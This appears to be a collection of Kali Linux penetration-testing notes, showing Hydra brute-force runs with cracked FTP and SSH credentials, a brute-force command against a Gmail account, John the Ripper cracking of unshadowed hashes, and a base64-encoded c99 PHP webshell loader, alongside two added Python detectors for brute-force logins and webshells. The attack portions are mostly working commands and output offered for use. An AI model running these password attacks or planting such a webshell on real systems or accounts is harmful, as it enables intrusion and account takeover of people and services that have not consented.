Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-12 02:01:01
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 16 tasks per 1 server, overall 64 tasks, 42 login tries (l:7/p:6), ~0 tries per task
[DATA] attacking service ftp on port 50000
[50000][ftp] host: 192.168.2.13 login: ewb1 password: 123
[50000][ftp] host: 192.168.2.13 login: ftp1 password: 123
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-12 02:01:16
Creating a users file.
cat > users.txt
root
admin
administrator
ewb
ewb1
ftp
ftp1
ctrl + d (save and exit)
cat > passlist.txt
123
jura
eu
pizza
test
teste
ctrl + d (save and exit)
Another option is to use one of the password dictionaries that ship with Kali -> rockyou
In the Kali terminal, let's look for the file.
locate *rockyou*
Unpack it.
gunzip /usr/share/wordlists/rockyou.txt.gz
Move the file to the root directory.
mv /usr/share/wordlists/rockyou.txt /root/rockyou.txt
Listing the file.
ls -lh
-rw-r--r-- 1 root root 134M Mar 3 2013 rockyou.txt
Or ... download wordlist
mkdir -p /usr/share/wordlists/
git clone https://github.com/danielmiessler/SecLists/ /usr/share/wordlists/
cd /usr/share/wordlists/Passwords/Leaked-Databases/
tar -xvzf rockyou-withcount.txt.tar.gz
tar -xvzf rockyou.txt.tar.gz
ls -lhS rock*
1 jura jura 243M Sep 23 2015 rockyou-withcount.txt
1 jura jura 134M Sep 23 2015 rockyou.txt
-rw-r--r-- 1 root root 54M Nov 30 15:20 rockyou-withcount.txt.tar.gz
-rw-r--r-- 1 root root 51M Nov 30 15:20 rockyou.txt.tar.gz
-rw-r--r-- 1 root root 468K Nov 30 15:20 rockyou-75.txt
-rw-r--r-- 1 root root 337K Nov 30 15:20 rockyou-70.txt
-rw-r--r-- 1 root root 239K Nov 30 15:20 rockyou-65.txt
-rw-r--r-- 1 root root 167K Nov 30 15:20 rockyou-60.txt
-rw-r--r-- 1 root root 113K Nov 30 15:20 rockyou-55.txt
-rw-r--r-- 1 root root 75K Nov 30 15:20 rockyou-50.txt
-rw-r--r-- 1 root root 48K Nov 30 15:20 rockyou-45.txt
-rw-r--r-- 1 root root 31K Nov 30 15:20 rockyou-40.txt
-rw-r--r-- 1 root root 20K Nov 30 15:20 rockyou-35.txt
-rw-r--r-- 1 root root 12K Nov 30 15:20 rockyou-30.txt
-rw-r--r-- 1 root root 7.1K Nov 30 15:20 rockyou-25.txt
-rw-r--r-- 1 root root 4.0K Nov 30 15:20 rockyou-20.txt
-rw-r--r-- 1 root root 1.9K Nov 30 15:20 rockyou-15.txt
-rw-r--r-- 1 root root 723 Nov 30 15:20 rockyou-10.txt
-rw-r--r-- 1 root root 104 Nov 30 15:20 rockyou-05.txt
rm *.tar.gz
du -sch /usr/share/wordlists/Passwords/
282M /usr/share/wordlists/Passwords/
282M total
hydra -l jura -P /usr/share/wordlists/Passwords/Leaked-Databases/rockyou-withcount.txt 192.168.10.108 -t 4 ssh
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.105 -t 4 -e nsr ssh
hydra -l root -P /usr/share/wordlists/Passwords/Leaked-Databases/rockyou-withcount.txt 192.168.1.105 -t 4 -e nsr ssh
Using the dictionary.
hydra 192.168.2.13 ftp -s 50000 -L /root/users.txt -P /root/rockyou.txt
Example 3
hydra -l root -P passlist.txt 192.168.2.13 ssh
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-12 02:11:45
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 6 tasks per 1 server, overall 64 tasks, 6 login tries (l:1/p:6), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.2.13 login: root password: 123
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-12 02:11:58
Example 4
Brute force against a Google email account.
hydra -S -l emailx@gmail.com -P /usr/share/wordlists/nmap.lst -e ns -V -s 465 smtp.gmail.com smtp
hydra -S -l 2helpmeout@gmail.com -P /root/users.txt -P /root/rockyou.txt -e ns -V -s 465 smtp.gmail.com smtp
hydra -t 5 -V -f -l jura -P passlist.txt localhost ssh
hydra -t 5 -V -f -l root -e ns -P passlist.txt localhost mysql
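Every hydra attempt above produces a `Failed password` line in the target's auth.log, and the final `[22][ssh] host: ... password: 123` line corresponds to an `Accepted password` entry from the same source. As an added example (not from the original notes), this Python detector flags a source that reaches a failure threshold inside a short window and, at higher severity, any later successful login from a source already flagged; the auth.log excerpt and addresses are constructed, and the year is assumed because syslog timestamps omit it.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed auth.log excerpt (not a real capture). The first six lines have
# the shape hydra's ssh run above leaves on the target: a burst of failures
# from one source, then a success with the guessed password.
SAMPLE_AUTH_LOG = """\
May 12 01:01:33 kali sshd[2211]: Failed password for jura from 192.0.2.10 port 50211 ssh2
May 12 01:01:33 kali sshd[2212]: Failed password for jura from 192.0.2.10 port 50212 ssh2
May 12 01:01:34 kali sshd[2213]: Failed password for jura from 192.0.2.10 port 50213 ssh2
May 12 01:01:34 kali sshd[2214]: Failed password for jura from 192.0.2.10 port 50214 ssh2
May 12 01:01:34 kali sshd[2215]: Failed password for invalid user admin from 192.0.2.10 port 50215 ssh2
May 12 01:01:35 kali sshd[2216]: Accepted password for jura from 192.0.2.10 port 50216 ssh2
May 12 01:30:00 kali sshd[2300]: Failed password for jura from 192.0.2.77 port 40001 ssh2
May 12 01:45:00 kali sshd[2301]: Accepted publickey for jura from 192.0.2.77 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def parse_ts(ts: str, year: int = 2017) -> datetime:
    """Syslog timestamps carry no year; assume one (the notes date from 2017)."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")

def detect_bruteforce(text: str, threshold: int = 5,
                      window_seconds: int = 60) -> list[tuple[str, str, str]]:
    """Return (ip, kind, user) alerts in log order.

    kind is 'bruteforce' the first time an IP reaches `threshold` failures
    within `window_seconds`, and 'success_after_bruteforce' for every later
    successful login from an IP that has already been flagged.
    """
    recent: dict[str, deque] = defaultdict(deque)  # ip -> recent failure times
    flagged: set[str] = set()
    alerts: list[tuple[str, str, str]] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, user, ts = m["ip"], m["user"], parse_ts(m["ts"])
        if m["result"] == "Failed":
            window = recent[ip]
            window.append(ts)
            # drop failures that have fallen out of the sliding window
            while (ts - window[0]).total_seconds() > window_seconds:
                window.popleft()
            if len(window) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append((ip, "bruteforce", user))
        elif ip in flagged:
            alerts.append((ip, "success_after_bruteforce", user))
    return alerts

if __name__ == "__main__":
    for ip, kind, user in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(f"{kind:26} {ip:15} last user: {user}")
```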
13 - Cracking passwords with john the ripper
In the Kali 2.0 terminal, type the commands below:
unshadow /etc/passwd /etc/shadow >> mypasswd.txt
cat mypasswd.txt
root:$6$MH8TLS/Q$C3Vtt7RaOIcWXLcnva71/RPoj9TJ6g42xgCG0HqpJMPrkIAAKSLKjo2MRNgu3/wPiIaXg/PFB9w9gPq/mQhXC.:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:*:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:*:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:*:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:*:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:*:104:65534::/nonexistent:/bin/false
mysql:!:105:109:MySQL Server,,,:/nonexistent:/bin/false
epmd:*:106:110::/var/run/epmd:/bin/false
Debian-exim:!:107:111::/var/spool/exim4:/bin/false
uuidd:*:108:113::/run/uuidd:/bin/false
rwhod:*:109:65534::/var/spool/rwho:/bin/false
iodine:*:110:65534::/var/run/iodine:/bin/false
miredo:*:111:65534::/var/run/miredo:/bin/false
ntp:*:112:114::/home/ntp:/bin/false
stunnel4:!:113:116::/var/run/stunnel4:/bin/false
redsocks:!:114:117::/var/run/redsocks:/bin/false
rtkit:*:115:118:RealtimeKit,,,:/proc:/bin/false
postgres:*:116:119:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
dnsmasq:*:117:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:*:118:120::/var/run/dbus:/bin/false
arpwatch:!:119:122:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh
usbmux:*:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
sslh:!:122:126::/nonexistent:/bin/false
geoclue:*:123:128::/var/lib/geoclue:/bin/false
couchdb:*:124:129:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash
avahi:*:125:131:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
sshd:*:126:65534::/var/run/sshd:/usr/sbin/nologin
colord:*:127:132:colord colour management daemon,,,:/var/lib/colord:/bin/false
saned:*:128:134::/var/lib/saned:/bin/false
speech-dispatcher:!:129:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
pulse:*:130:135:PulseAudio daemon,,,:/var/run/pulse:/bin/false
king-phisher:*:131:137::/var/lib/king-phisher:/bin/false
Debian-gdm:*:132:139:Gnome Display Manager:/var/lib/gdm3:/bin/false
dradis:*:133:140::/var/lib/dradis:/bin/false
beef-xss:*:134:141::/var/lib/beef-xss:/bin/false
jura:$6$Kxd.KdHp$VioUe6iuTfhFLUp0cC.2LcN5pQ0wqdQ44YPL.3fefmvY2IyVA2yCAGgui/.IouHIX2CuR873KeKXJsMNaWI7v/:1000:1000:,,,:/home/jura:/bin/bash
privoxy:*:121:65534::/etc/privoxy:/bin/false
debian-tor:*:135:125::/var/lib/tor:/bin/false
Debian-snmp:!:136:142::/var/lib/snmp:/bin/false
/usr/sbin/john --wordlist=passlist.txt --rules mypasswd.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
123 (root)
123 (jura)
2g 0:00:00:00 DONE (2017-05-12 02:33) 6.666g/s 213.3p/s 426.6c/s 426.6C/s 123..jura4
Use the "--show" option to display all of the cracked passwords reliably
Session completed
/usr/sbin/john --show mypasswd.txt
root:123:0:0:root:/root:/bin/bash
jura:123:1000:1000:,,,:/home/jura:/bin/bash
2 password hashes cracked, 0 left
14 - HashKiller
Decrypting "weak" passwords.
The longer the password and the more character classes it mixes, the harder
it is to recover it from its hash.
Site for looking up hashes / passwords:
http://www.hashkiller.co.uk/md5-decrypter.aspx
202cb962ac59075b964b07152d234b70
cat > hello.pl
#!/usr/bin/perl
print "Enter your name: ";
$name = <STDIN>;   # read one line from standard input
chomp($name);      # drop the trailing newline
print "Hello, ${name} ... you will soon be a Perl addict!\n";
Running
perl hello.pl
20 - Compiling Python
Example 1
cat > p1.py
#!/usr/bin/python
print ("Hello World!")
print ("This is fun.")
Running.
python p1.py
or go to the website https://repl.it/languages/python3
Copy the code above, paste it and click the button "Run"
Example 2
cat > p2.py
#!/usr/bin/python
name = raw_input('What is your name?\n')
print 'Hi, %s.' % name
Running.
python p2.py
21 - Shell Base64 Encoding
http://www.localroot.net/
or
http://www.r57.gen.tr/
Choose shell c99
Paste it into the site below and "encode"; it will produce a huge base64 string ...
http://www.freeformatter.com/base64-encoder.html
Click ENCODE to generate the huge encoded blob…
Create the file "shell1.php" and paste the base64 code into it.
nano shell1.php
<?php
eval(base64_decode("cole_aqui_a_shell_em_base64_paste_in_here_encoded_shell"));
?>
ctrl + x + y
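The `eval(base64_decode(...))` loader written into shell1.php is also the signature a defender looks for on a web root. As an added example (not from these notes), this Python scanner flags that loader in PHP source, decodes the blob and reports shell-related tokens found inside it, and separately flags unusually long base64 literals; the two sample files are constructed, and the "payload" is an inert stand-in that only carries the tokens.

```python
import base64
import binascii
import re
from pathlib import Path
from typing import Optional

# The loader shape from shell1.php above: eval(base64_decode("<blob>")).
EVAL_B64_RE = re.compile(
    r"\b(?:eval|assert)\s*\(\s*base64_decode\s*\(\s*['\"]"
    r"(?P<b64>[A-Za-z0-9+/=\s]{40,}?)['\"]\s*\)",
    re.IGNORECASE,
)
# A base64 literal this long is worth a look even without eval() around it.
LONG_B64_RE = re.compile(r"['\"][A-Za-z0-9+/]{400,}={0,2}['\"]")
# Tokens that, inside a decoded blob, point at a command-execution shell.
SHELL_TOKENS = re.compile(
    r"\bc99|\br57|\b(?:system|passthru|shell_exec|exec|popen|proc_open)\b"
    r"|\$_(?:GET|POST|REQUEST)\b",
    re.IGNORECASE,
)

def decode_b64(blob: str) -> Optional[str]:
    """Strictly decode a base64 blob (whitespace tolerated); None if not base64."""
    try:
        raw = base64.b64decode(re.sub(r"\s+", "", blob), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", "replace")

def scan_php_source(src: str) -> list[str]:
    """Human-readable findings for one PHP file's source (empty if clean)."""
    findings = []
    for m in EVAL_B64_RE.finditer(src):
        findings.append("eval(base64_decode(...)) loader")
        decoded = decode_b64(m["b64"])
        if decoded is not None:
            tokens = sorted({t.group(0).lower() for t in SHELL_TOKENS.finditer(decoded)})
            if tokens:
                findings.append("decoded payload contains: " + ", ".join(tokens))
    if LONG_B64_RE.search(src):
        findings.append("long base64 literal")
    return findings

def scan_tree(root: str) -> dict[str, list[str]]:
    """Scan every .php file under root; return {path: findings} for flagged files."""
    flagged = {}
    for path in Path(root).rglob("*.php"):
        findings = scan_php_source(path.read_text(errors="replace"))
        if findings:
            flagged[str(path)] = findings
    return flagged

# Constructed samples. The "payload" is an inert stand-in for a c99-style
# shell: it only holds the tokens a scanner keys on and executes nothing.
PAYLOAD_SRC = '<?php /* constructed */ $banner = "c99shell"; $fn = "system"; $in = $_GET; ?>'
WEBSHELL_PHP = '<?php\neval(base64_decode("%s"));\n?>\n' % (
    base64.b64encode(PAYLOAD_SRC.encode()).decode())
# Legitimate base64_decode use (a 1x1 PNG) with no eval(): must not be flagged.
BENIGN_PHP = ('<?php\n$png = base64_decode("iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJ'
              'AAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==");\n'
              'header("Content-Type: image/png");\necho $png;\n')

if __name__ == "__main__":
    print("webshell:", scan_php_source(WEBSHELL_PHP))
    print("benign:  ", scan_php_source(BENIGN_PHP))
```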
22 - zip, rar, tar.gz, bz2, tar, bz2
Unpacking files
zip : unzip nome_do_arquivo.zip
rar : unrar x nome_do_arquivo.rar
tar : tar -xvf nome_do_arquivo.tar
tar.gz : tar -vzxf nome_do_arquivo.tar.gz
bz2 : bunzip2 nome_do_arquivo.bz2
tar.bz2 : tar -jxvf nome_do_arquivo.tar.bz2
Tor Iptables script is an anonymizer that sets up iptables and tor to route all
services and traffic including DNS through the Tor network.
Please, click here to see the script and copy it.
apt-get install tor
systemctl start tor
apt install tor python-notify
If you want, you can add the Tor service to startup:
sudo systemctl enable tor
or
systemctl enable tor
The beginning of the script:
iptables -L
25 - Encrypt x Decrypt Text
"Wisdom is like a river, the deeper it is the less noise it makes"